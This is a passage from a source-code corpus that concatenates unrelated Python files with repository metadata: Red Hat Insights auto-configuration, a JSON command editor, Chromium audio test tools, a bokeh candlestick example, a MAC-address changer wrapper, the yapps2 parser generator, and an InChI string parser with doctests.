logger.debug('System is subscription-manager registered')
rhsm_hostname = rhsm_config.get('server', 'hostname')
rhsm_hostport = rhsm_config.get('server', 'port')
rhsm_proxy_hostname = rhsm_config.get('server', 'proxy_hostname').strip()
rhsm_proxy_port = rhsm_config.get('server', 'proxy_port').strip()
rhsm_proxy_user = rhsm_config.get('server', 'proxy_user').strip()
rhsm_proxy_pass = rhsm_config.get('server', 'proxy_password').strip()
proxy = None
if rhsm_proxy_hostname != "":
logger.debug("Found rhsm_proxy_hostname %s", rhsm_proxy_hostname)
proxy = "http://"
if rhsm_proxy_user != "" and rhsm_proxy_pass != "":
logger.debug("Found user and password for rhsm_proxy")
proxy = proxy + rhsm_proxy_user + ":" + rhsm_proxy_pass + "@"
proxy = proxy + rhsm_proxy_hostname + ':' + rhsm_proxy_port
logger.debug("RHSM Proxy: %s", proxy)
logger.debug("Found Satellite Server Host: %s, Port: %s",
rhsm_hostname, rhsm_hostport)
rhsm_ca = rhsm_config.get('rhsm', 'repo_ca_cert')
logger.debug("Found CA: %s", rhsm_ca)
logger.debug("Setting authmethod to CERT")
config['authmethod'] = 'CERT'
# Directly connected to Red Hat, use cert auth directly with the api
if (rhsm_hostname == 'subscription.rhn.redhat.com' or
rhsm_hostname == 'subscription.rhsm.redhat.com'):
logger.debug("Connected to Red Hat Directly, using cert-api")
rhsm_hostname = 'cert-api.access.redhat.com'
rhsm_ca = None
else:
# Set the host path
# 'rhsm_hostname' should really be named ~ 'rhsm_host_base_url'
rhsm_hostname = rhsm_hostname + ':' + rhsm_hostport + '/redhat_access'
logger.debug("Trying to set auto_configuration")
set_auto_configuration(rhsm_hostname, rhsm_ca, proxy)
return True
except Exception as e:
logger.debug(e)
logger.debug('System is NOT subscription-manager registered')
return False
def _read_systemid_file(path):
with open(path, "r") as systemid:
data = systemid.read().replace('\n', '')
return data
def _try_satellite5_configuration():
"""
Attempt to determine Satellite 5 Configuration
"""
logger.debug("Trying Satellite 5 auto_config")
rhn_config = '/etc/sysconfig/rhn/up2date'
systemid = '/etc/sysconfig/rhn/systemid'
if os.path.isfile(rhn_config):
if os.path.isfile(systemid):
config['systemid'] = _read_systemid_file(systemid)
else:
logger.debug("Could not find Satellite 5 systemid file.")
return False
logger.debug("Found Satellite 5 Config")
rhn_conf_file = file(rhn_config, 'r')
hostname = None
for line in rhn_conf_file:
if line.startswith('serverURL='):
url = urlparse(line.split('=')[1])
hostname = url.netloc + '/redhat_access'
logger.debug("Found hostname %s", hostname)
if line.startswith('sslCACert='):
rhn_ca = line.strip().split('=')[1]
# Auto discover proxy stuff
if line.startswith('enableProxy='):
proxy_enabled = line.strip().split('=')[1]
if line.startswith('httpProxy='):
proxy_host_port = line.strip().split('=')[1]
if line.startswith('proxyUser='):
proxy_user = line.strip().split('=')[1]
if line.startswith('proxyPassword='):
proxy_password = line.strip().split('=')[1]
if hostname:
proxy = None
if proxy_enabled == "1":
proxy = "http://"
if proxy_user != "" and proxy_password != "":
logger.debug("Found user and password for rhn_proxy")
proxy = proxy + proxy_user + ':' + proxy_password
proxy = proxy + "@" + proxy_host_port
else:
proxy = proxy + proxy_host_port
logger.debug("RHN Proxy: %s", proxy)
set_auto_configuration(hostname, rhn_ca, proxy)
else:
logger.debug("Could not find hostname")
return False
return True
else:
logger.debug("Could not find rhn config")
return False
def try_auto_configuration():
"""
Try to auto-configure if we are attached to a sat5/6
"""
if config['auto_config'] and not config['offline']:
if not _try_satellite6_configuration():
_try_satellite5_configuration()
|
wcmitchell/insights-core
|
insights/client/auto_config.py
|
Python
|
apache-2.0
| 7,561 | 0.000265 |
import cmd
import json
import termcolor
from struct_manager import createEmptyCommandGroup, createEmptyStruct, createEmptyCommand
from populator import populateDict
class EditorShell ( cmd.Cmd ) :
def __init__ ( self, file ) :
cmd.Cmd.__init__(self)
self.file = file
# self.struct = json.load ( self.file )
try :
self.struct = json.load ( self.file )
except :
print "[!] Can't open the JSON file, creating a new struct"
self.struct = createEmptyStruct()
self.cur_node = self.struct
def do_add( self, line ) :
if not line :
return
line = line.strip()
toks = line.split()
ident = toks[0].lower()
if 'command' == ident :
self.do_add_command( ' '.join( toks [1:] ) )
pass # add command
elif 'group' == ident :
self.do_add_group( ' '.join( toks [1:] ) )
pass # add command
elif 'dependency' == ident :
pass # add command
else :
print " '%s' not available subcommand!" % ident
def do_add_group( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
codename, group = createEmptyCommandGroup( toks[0] )
populateDict(group)
print group
self.struct['CommandGroups'][ codename ] = group
def do_add_command( self, line ) :
if not line :
print "Need a 'group code name' "
return
line = line.strip()
toks = line.split()
codename = toks[0]
unique, command = createEmptyCommand( )
populateDict( command )
self.struct['CommandGroups'][ codename ]['Commands'][ unique ] = command
print "Command '%s' created!" % unique
def do_add_dependency( self, line ) :
pass
def do_show_command( self, line ) :
pass
def do_edit_command( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
ident = toks[0]
for gname, group in self.struct['CommandGroups'].iteritems() :
try :
comm = group['Commands'][ident]
break
except :
pass
if not comm :
print "Identifier '%s' doesn't exist" % comm
return
populateDict( comm, False )
def do_edit_group( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
gname = toks[0]
group = self.struct['CommandGroups'][gname]
populateDict( group )
if not comm :
print "Identifier '%s' doesn't exist" % comm
return
def do_list( self, line ) :
for group in self.struct['CommandGroups'].keys() :
print group
def do_list_commands( self, line ) :
for gname, group in self.struct['CommandGroups'].iteritems() :
print "=========== %s ===========" % group['name']
for k, v in group['Commands'].iteritems() :
print '''{0:24} -| {1:<64}\n-> {2:<64}
'''.format( k, v['command'].encode('utf8'), v['description'].encode('utf8') )
print "=========== --- ==========="
print
def do_save( self, line ) :
self.file.seek(0)
self.file.write( json.dumps( self.struct, indent = 1 ) + '\n' )
self.file.truncate()
def do_create_dependency( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
dep = toks[0]
self.struct['DependencyTokens'].append( dep )
def do_d_list( self, line ) :
for group in self.struct.keys() :
print group
def do_d_show( self, line ) :
print json.dumps( self.struct, indent = 1 )
|
operatorequals/gatheros
|
gatheros/editor/cmd_interface.py
|
Python
|
bsd-3-clause
| 3,370 | 0.07092 |
import networkx as nx
class Roadmap(nx.Graph):
def __init__(self, gd, max_dist, *args, **kwargs):
self.gd = gd
self.max_dist = max_dist
nx.Graph.__init__(self, *args, **kwargs)
def insert(self, sample):
self.gd.insert(sample)
for smpl in self.gd.get_nearest(sample):
if smpl == sample:
continue
if smpl.dist_to(sample) <= self.max_dist:
self.add_edge(smpl, sample)
def make(*args, **kwargs):
return Roadmap(*args, **kwargs)
|
wallarelvo/racer
|
racer/roadmap.py
|
Python
|
apache-2.0
| 539 | 0 |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Audio tools for recording and analyzing audio.
The audio tools provided here are mainly to:
- record playing audio.
- remove silence from beginning and end of audio file.
- compare audio files using PESQ tool.
The tools are supported on Windows and Linux.
"""
import commands
import ctypes
import logging
import os
import re
import subprocess
import sys
import threading
import time
import pyauto_media
import pyauto
_TOOLS_PATH = os.path.abspath(os.path.join(pyauto.PyUITest.DataDir(),
'pyauto_private', 'media', 'tools'))
WINDOWS = 'win32' in sys.platform
if WINDOWS:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq.exe')
_SOX_PATH = os.path.join(_TOOLS_PATH, 'sox.exe')
_AUDIO_RECORDER = r'SoundRecorder.exe'
else:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq')
_SOX_PATH = commands.getoutput('which sox')
_AUDIO_RECORDER = commands.getoutput('which arecord')
_PACMD_PATH = commands.getoutput('which pacmd')
class AudioRecorderThread(threading.Thread):
"""A thread that records audio out of the default audio output."""
def __init__(self, duration, output_file, record_mono=False):
threading.Thread.__init__(self)
self.error = ''
self._duration = duration
self._output_file = output_file
self._record_mono = record_mono
def run(self):
"""Starts audio recording."""
if WINDOWS:
if self._record_mono:
raise Exception("Mono recording not supported on Windows yet!")
duration = time.strftime('%H:%M:%S', time.gmtime(self._duration))
cmd = [_AUDIO_RECORDER, '/FILE', self._output_file, '/DURATION',
duration]
# This is needed to run SoundRecorder.exe on Win-64 using Python-32 bit.
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(
ctypes.byref(ctypes.c_long()))
else:
num_channels = 1 if self._record_mono else 2
cmd = [_AUDIO_RECORDER, '-d', self._duration, '-f', 'dat', '-c',
str(num_channels), self._output_file]
cmd = [str(s) for s in cmd]
logging.debug('Running command: %s', ' '.join(cmd))
returncode = subprocess.call(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if returncode != 0:
self.error = 'Failed to record audio.'
else:
logging.debug('Finished recording audio into %s.', self._output_file)
def RunPESQ(audio_file_ref, audio_file_test, sample_rate=16000):
"""Runs PESQ to compare audio test file to a reference audio file.
Args:
audio_file_ref: The reference audio file used by PESQ.
audio_file_test: The audio test file to compare.
sample_rate: Sample rate used by PESQ algorithm, possible values are only
8000 or 16000.
Returns:
A tuple of float values representing PESQ scores of the audio_file_ref and
audio_file_test consecutively.
"""
# Work around a bug in PESQ when the ref file path is > 128 chars. PESQ will
# compute an incorrect score then (!), and the relative path to the ref file
# should be a lot shorter than the absolute one.
audio_file_ref = os.path.relpath(audio_file_ref)
cmd = [_PESQ_PATH, '+%d' % sample_rate, audio_file_ref, audio_file_test]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error running pesq: %s\n%s', output, error)
# Last line of PESQ output shows the results. Example:
# P.862 Prediction (Raw MOS, MOS-LQO): = 4.180 4.319
result = re.search('Prediction.*= (\d{1}\.\d{3})\t(\d{1}\.\d{3})',
output)
if not result or len(result.groups()) != 2:
return None
return (float(result.group(1)), float(result.group(2)))
def RemoveSilence(input_audio_file, output_audio_file):
"""Removes silence from beginning and end of the input_audio_file.
Args:
input_audio_file: The audio file to remove silence from.
output_audio_file: The audio file to save the output audio.
"""
# SOX documentation for silence command: http://sox.sourceforge.net/sox.html
# To remove the silence from both beginning and end of the audio file, we call
# sox silence command twice: once on normal file and again on its reverse,
# then we reverse the final output.
# Silence parameters are (in sequence):
# ABOVE_PERIODS: The period for which silence occurs. Value 1 is used for
# silence at beginning of audio.
# DURATION: the amount of time in seconds that non-silence must be detected
# before sox stops trimming audio.
# THRESHOLD: value used to indicate what sample value is treates as silence.
ABOVE_PERIODS = '1'
DURATION = '2'
THRESHOLD = '5%'
cmd = [_SOX_PATH, input_audio_file, output_audio_file, 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse', 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse']
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error removing silence from audio: %s\n%s', output, error)
def ForceMicrophoneVolumeTo100Percent():
if WINDOWS:
logging.error('Volume forcing not implemented on Windows yet.')
else:
# The recording device id is machine-specific. We assume here it is called
# Monitor of render (which corresponds to the id render.monitor). You can
# list the available recording devices with pacmd list-sources.
RECORDING_DEVICE_ID = 'render.monitor'
HUNDRED_PERCENT_VOLUME = '65536'
cmd = [_PACMD_PATH, 'set-source-volume', RECORDING_DEVICE_ID,
HUNDRED_PERCENT_VOLUME]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error forcing mic volume to 100%%: %s\n%s', output, error)
|
loopCM/chromium
|
chrome/test/functional/media/audio_tools.py
|
Python
|
bsd-3-clause
| 6,222 | 0.010125 |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
###########################################################################
# Module Written to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
###############Credits######################################################
# Coded by: Humberto Arocha <hbto@vauxoo.com>
# María Gabriela Quilarque <gabriela@vauxoo.com>
# Javier Duran <javier@vauxoo.com>
# Planified by: Nhomar Hernandez
# Finance by: Helados Gilda, C.A. http://heladosgilda.com.ve
# Audited by: Humberto Arocha humberto@openerp.com.ve
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import model
import report
import wizard
#import edi
|
thinkasoft/ProyectoRD-dev
|
l10n_ve_withholding_islr/__init__.py
|
Python
|
agpl-3.0
| 1,587 | 0.002522 |
from math import pi
import pandas as pd
from bokeh.sampledata.stocks import MSFT
from bokeh.plotting import *
df = pd.DataFrame(MSFT)[:50]
df['date'] = pd.to_datetime(df['date'])
mids = (df.open + df.close)/2
spans = abs(df.close-df.open)
inc = df.close > df.open
dec = df.open > df.close
w = 12*60*60*1000 # half day in ms
output_cloud("candlestick")
figure(x_axis_type = "datetime", tools="pan,wheel_zoom,box_zoom,reset,previewsave",
width=1000, name="candlestick")
hold()
segment(df.date, df.high, df.date, df.low, color='black')
rect(df.date[inc], mids[inc], w, spans[inc], fill_color="#D5E1DD", line_color="black")
rect(df.date[dec], mids[dec], w, spans[dec], fill_color="#F2583E", line_color="black")
curplot().title = "MSFT Candlestick"
xaxis().major_label_orientation = pi/4
grid().grid_line_alpha=0.3
# open a browser
show()
|
sahat/bokeh
|
examples/plotting/cloud/candlestick.py
|
Python
|
bsd-3-clause
| 853 | 0.009379 |
from __future__ import absolute_import, division, print_function
import os
class Config(object):
""" Default configuration """
DEBUG = False
APPR_URI = os.getenv('APPR_URI', "http://localhost:5000")
class ProductionConfig(Config):
""" Production configuration """
APPR_URI = "http://localhost:5000"
APPR_BACKEND = 'false'
class DevelopmentConfig(Config):
""" Development configuration """
DEBUG = True
# APPR_URI = 'https://api.appr.sh'
APPR_URI = os.getenv('APPR_URI', "http://localhost:5000")
|
cn-app-registry/cnr-server
|
appr/api/config.py
|
Python
|
apache-2.0
| 545 | 0 |
# Module: macchanger.py
# Description: Wrapper for built-in linux tool macchanger.
# Author: Nick Sanzotta/@Beamr
# Version: v 1.09252017
try:
import os, sys, time
from subprocess import Popen, PIPE
from theme import *
except Exception as e:
print('\n [!] MACCHANGE - Error: ' % (e))
sys.exit(1)
def macRandom(interface):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchanger -r ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(blue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
def macManual(interface, macaddress):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchanger -m ' + macaddress + ' ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(blue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
|
NickSanzotta/WiFiSuite
|
wifisuite/helpers/macchange.py
|
Python
|
mit
| 1,617 | 0.019171 |
#!/usr/bin/env python2
#
# Yapps 2 - yet another python parser system
# Copyright 1999-2003 by Amit J. Patel <amitp@cs.stanford.edu>
#
# This version of Yapps 2 can be distributed under the
# terms of the MIT open source license, either found in the LICENSE file
# included with the Yapps distribution
# <http://theory.stanford.edu/~amitp/yapps/> or at
# <http://www.opensource.org/licenses/mit-license.php>
#
import sys, re
from yapps import runtime, parsetree
def generate(inputfilename, outputfilename='', dump=0, **flags):
"""Generate a grammar, given an input filename (X.g)
and an output filename (defaulting to X.py)."""
if not outputfilename:
if inputfilename.endswith('.g'):
outputfilename = inputfilename[:-2] + '.py'
else:
raise Exception('Must specify output filename if input filename is not *.g')
DIVIDER = '\n%%\n' # This pattern separates the pre/post parsers
preparser, postparser = None, None # Code before and after the parser desc
# Read the entire file
s = open(inputfilename,'r').read()
# See if there's a separation between the pre-parser and parser
f = s.find(DIVIDER)
if f >= 0: preparser, s = s[:f]+'\n\n', s[f+len(DIVIDER):]
# See if there's a separation between the parser and post-parser
f = s.find(DIVIDER)
if f >= 0: s, postparser = s[:f], '\n\n'+s[f+len(DIVIDER):]
# Create the parser and scanner and parse the text
scanner = grammar.ParserDescriptionScanner(s, filename=inputfilename)
if preparser: scanner.del_line += preparser.count('\n')
parser = grammar.ParserDescription(scanner)
t = runtime.wrap_error_reporter(parser, 'Parser')
if t is None: return 1 # Failure
if preparser is not None: t.preparser = preparser
if postparser is not None: t.postparser = postparser
# Check the options
for f in t.options.keys():
for opt,_,_ in yapps_options:
if f == opt: break
else:
print >>sys.stderr, 'Warning: unrecognized option', f
# Add command line options to the set
for f in flags.keys(): t.options[f] = flags[f]
# Generate the output
if dump:
t.dump_information()
else:
t.output = open(outputfilename, 'w')
t.generate_output()
return 0
if __name__ == '__main__':
import doctest
doctest.testmod(sys.modules['__main__'])
doctest.testmod(parsetree)
# Someday I will use optparse, but Python 2.3 is too new at the moment.
yapps_options = [
('context-insensitive-scanner',
'context-insensitive-scanner',
'Scan all tokens (see docs)'),
]
import getopt
optlist, args = getopt.getopt(sys.argv[1:], 'f:', ['help', 'dump', 'use-devel-grammar'])
if not args or len(args) > 2:
print >>sys.stderr, 'Usage:'
print >>sys.stderr, ' python', sys.argv[0], '[flags] input.g [output.py]'
print >>sys.stderr, 'Flags:'
print >>sys.stderr, (' --dump' + ' '*40)[:35] + 'Dump out grammar information'
print >>sys.stderr, (' --use-devel-grammar' + ' '*40)[:35] + 'Use the devel grammar parser from yapps_grammar.py instead of the stable grammar from grammar.py'
for flag, _, doc in yapps_options:
print >>sys.stderr, (' -f' + flag + ' '*40)[:35] + doc
else:
# Read in the options and create a list of flags
flags = {}
use_devel_grammar = 0
for opt in optlist:
for flag, name, _ in yapps_options:
if opt == ('-f', flag):
flags[name] = 1
break
else:
if opt == ('--dump', ''):
flags['dump'] = 1
elif opt == ('--use-devel-grammar', ''):
use_devel_grammar = 1
else:
print >>sys.stderr, 'Warning: unrecognized option', opt[0], opt[1]
if use_devel_grammar:
import yapps_grammar as grammar
else:
from yapps import grammar
sys.exit(generate(*tuple(args), **flags))
|
swesterfeld/beast
|
yapps2_deb/yapps2.py
|
Python
|
lgpl-2.1
| 4,135 | 0.006288 |
import re
from collections import namedtuple
# this is almost a validating expression, it could certainly be simpler by just using [^/]* inside the groups
chargeDef = r"(/q[\-\+0-9;\*mMnNi]*)?"
protonationDef = r"(/p[\-\+0-9,;]*)?"
isotopeDef = r"(/i[\-\+0-9,;HDT]*(?:/h[0-9HDT]+)*)?"
stereoBondDef=r"(/b[\-\+0-9,\?\*;mNnNi]*)?"
stereoTetDef=r"(/t[\-\+0-9,\?;\*mMnNi]*)?"
stereoMDef=r"(/m[\-\+0-9,;\.]*)?"
stereoSDef=r"(/s[\-\+0-9,;]*)?"
inchiLayers=(
r"(InChI=1S?)",
r"(/[a-zA-Z0-9\.]*)", # formula
r"(/c[0-9\(\)\-\,\*;]*)?", # skeleton
r"(/h[0-9,\-\Hh\*\(\);]*)?", # hydrogens
chargeDef, # charge
protonationDef, # protonation
stereoBondDef, # stereo_bond
stereoTetDef, #stereo_tet
stereoMDef, #stereo_m
stereoSDef, #stereo_s
isotopeDef, #isotope
stereoBondDef, #isotope_stereo_bond
stereoTetDef, #isotope_stereo_tet
stereoMDef, #isotope_stereo_m
stereoSDef, #isotope_stereo_s
r"(/f[a-zA-Z0-9\.]*(?:/h[0-9,\-\Hh\*\(\);]*)?)?", # fixed_h
chargeDef, # fixedh_charge
protonationDef, # fixedh_protonation
stereoBondDef, #fixedh_stereo_bond
stereoTetDef, #fixedh_stereo_tet
stereoMDef, #fixedh_stereo_m
stereoSDef, #fixedh_stereo_s
isotopeDef, #fixedh_isotope
stereoBondDef, #fixedh_isotope_stereo_bond
stereoTetDef, #fixedh_isotope_stereo_tet
stereoMDef, #fixedh_isotope_stereo_m
stereoSDef, #fixedh_isotope_stereo_s
r"(/o[\(\)0-9,]*)?", # transposition
r"(/r.*)?", # reconnected_main # <- FIX: we punt on this
)
coreExpr=re.compile(''.join(inchiLayers))
Layers=namedtuple("Layers",['start','formula','skeleton','hydrogens',
# pos 4
'charge','protonation',
# pos 6
'stereo_bond','stereo_tet','stereo_m','stereo_s',
# pos 10
'isotope','isotope_stereo_bond','isotope_stereo_tet','isotope_stereo_m','isotope_stereo_s',
# pos 15
'fixedh','fixedh_charge','fixedh_protonation',
# pos 18
'fixedh_stereo_bond','fixedh_stereo_tet','fixedh_stereo_m','fixedh_stereo_s',
# pos 22
'fixedh_isotope','fixedh_isotope_stereo_bond','fixedh_isotope_stereo_tet','fixedh_isotope_stereo_m','fixedh_isotope_stereo_s',
# pos 27
'transposition',
'reconnected_main'
])
layerGroups = {
'main':tuple(range(4)),
'charge':tuple(range(4,6)),
'stereo':tuple(range(6,10)),
'isotope':tuple(range(10,15)),
'fixedh':tuple(range(15,27)),
}
def formulaGrouping(tpl):
return (tpl[0],tpl[1],)
def mainGrouping(tpl):
return (tpl[x] for x in layerGroups['main'])
def chargeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge'])
def stereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo'])
def isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'][0:1])
def isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'])
def stereo_isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'][0:1])
def stereo_isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'])
def extractLayers(inchi):
"""
>>> tpl=extractLayers('InChI=1S/C16H20N4O3/c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22/h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)/t13?,14-/m0/s1')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'C16H20N4O3'
>>> tpl.skeleton
'c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22'
>>> tpl.hydrogens
'h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)'
>>> tpl.charge
''
>>> tpl.protonation
''
>>> tpl.stereo_bond
''
>>> tpl.stereo_tet
't13?,14-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
>>> tpl.isotope
''
>>> tpl.fixedh
''
Charge layers:
From [O-]CCCC[NH3+]
>>> tpl = extractLayers('InChI=1S/C4H10NO/c5-3-1-2-4-6/h1-5H2/q-1/p+1')
>>> tpl.charge
'q-1'
>>> tpl.protonation
'p+1'
Stereochemistry:
From [O-][C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1S/C9H12ClN2O3/c10-7(13)3-1-2-6(4-8(11)14)5-9(12)15/h1-3,7H,4-5H2,(H2,11,14)(H2,12,15)/q-1/b3-1+/t7-/m0/s1')
>>> tpl.stereo_bond
'b3-1+'
>>> tpl.stereo_tet
't7-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
Isotopes:
From: [13CH3]O
>>> tpl = extractLayers('InChI=1S/CH4O/c1-2/h2H,1H3/i1+1')
>>> tpl.isotope
'i1+1'
>>> tpl.isotope_stereo_tet
''
Isotope + stereo
From: [13CH3]O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H7ClO/c1-3(4)5-2/h3H,1-2H3/t3-/m1/s1/i2+1')
>>> tpl.isotope
'i2+1'
>>> tpl.stereo_tet
't3-'
>>> tpl.isotope_stereo_tet
''
Isotope causes stereo
From: [13CH3][C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H8O/c1-3(2)4/h3-4H,1-2H3/i1+1/t3-/m1/s1')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
''
>>> tpl.isotope_stereo_tet
't3-'
Isotope causes stereo + standard stereo
From: [13CH3][C@H](C)O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C5H12O2/c1-4(2)7-5(3)6/h4-6H,1-3H3/t5-/m1/s1/i1+1/t4-,5-')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
't5-'
>>> tpl.isotope_stereo_tet
't4-,5-'
Fixed Hs and Isotopes
From: O=C([18O])/C=C/C(=[18O])O
>>> tpl = extractLayers('InChI=1/C4H3O4/c5-3(6)1-2-4(7)8/h1-2H,(H,5,6)/b2-1+/i5+2,7+2/f/h5H/i6+2,7+2')
>>> tpl.isotope
'i5+2,7+2'
>>> tpl.fixedh_isotope
'i6+2,7+2'
Fixed Hs causes stereo_bond
From: F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15)/b3-1+/t7-/m0/s1/f/h12,14H,13H2/b3-1+,6-2-,12-8?')
>>> tpl.fixedh
'f/h12,14H,13H2'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?'
Fixed Hs causes stereo
From: C[C@H](Cl)[C@H](/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C7H13ClN2O2/c1-4(8)5(2-6(9)11)3-7(10)12/h4-5H,2-3H2,1H3,(H2,9,11)(H2,10,12)/t4-/m0/s1/f/h9,11H,10H2/t4-,5+')
>>> tpl.fixedh
'f/h9,11H,10H2'
>>> tpl.fixedh_stereo_tet
't4-,5+'
Fixed Hs cause a new formula
From: C[C@H](CCC[C@@H](SCCC(C)(C)O)c1cccc(\C=C\c2ccc3ccc(Cl)cc3n2)c1)C(=O)[O-] # from ChEMBL
>>> tpl = extractLayers('InChI=1/C29H34ClNO3S/c1-20(28(32)33)6-4-9-27(35-17-16-29(2,3)34)23-8-5-7-21(18-23)10-14-25-15-12-22-11-13-24(30)19-26(22)31-25/h5,7-8,10-15,18-20,27,34H,4,6,9,16-17H2,1-3H3,(H,32,33)/p-1/b14-10+/t20-,27-/m1/s1/fC29H33ClNO3S/q-1')
>>> tpl.formula
'C29H34ClNO3S'
>>> tpl.fixedh
'fC29H33ClNO3S'
>>> tpl.fixedh_charge
'q-1'
Disconnected parts + Fixed Hs causes stereo_bond + isotopes cause stereo
From: [13CH3][C@H](C)O[C@H](C)O.F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2.C5H12O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15;1-4(2)7-5(3)6/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15);4-6H,1-3H3/b3-1+;/t7-;5-/m01/s1/i;1+1/t;4-,5-/f/h12,14H,13H2;/b3-1+,6-2-,12-8?;')
>>> tpl.stereo_bond
'b3-1+;'
>>> tpl.isotope
'i;1+1'
>>> tpl.isotope_stereo_tet
't;4-,5-'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?;'
Fixed Hs causes stereo + (FixedHs + isotopes) causes stereo (this is the most dependent example I can think of)
From: N=C(NC)C(/C(=NC)N)=C/CC/C=C(/C1=NC=C[15NH]1)C1NC=C[15N]=1
>>> tpl = extractLayers('InChI=1/C16H22N8/c1-19-13(17)11(14(18)20-2)5-3-4-6-12(15-21-7-8-22-15)16-23-9-10-24-16/h5-10H,3-4H2,1-2H3,(H2,17,19)(H2,18,20)(H,21,22)(H,23,24)/i21+1,23+1/f/h17,19,21,23H,18H2/b11-5-,17-13?,20-14?/i21+1,24+1/b11-5-,12-6-,17-13?,20-14?')
>>> tpl.isotope
'i21+1,23+1'
>>> tpl.isotope_stereo_bond
''
>>> tpl.fixedh
'f/h17,19,21,23H,18H2'
>>> tpl.fixedh_stereo_bond
'b11-5-,17-13?,20-14?'
>>> tpl.fixedh_isotope_stereo_bond
'b11-5-,12-6-,17-13?,20-14?'
Transposition:
From the InChI tech manual Fig A3-3
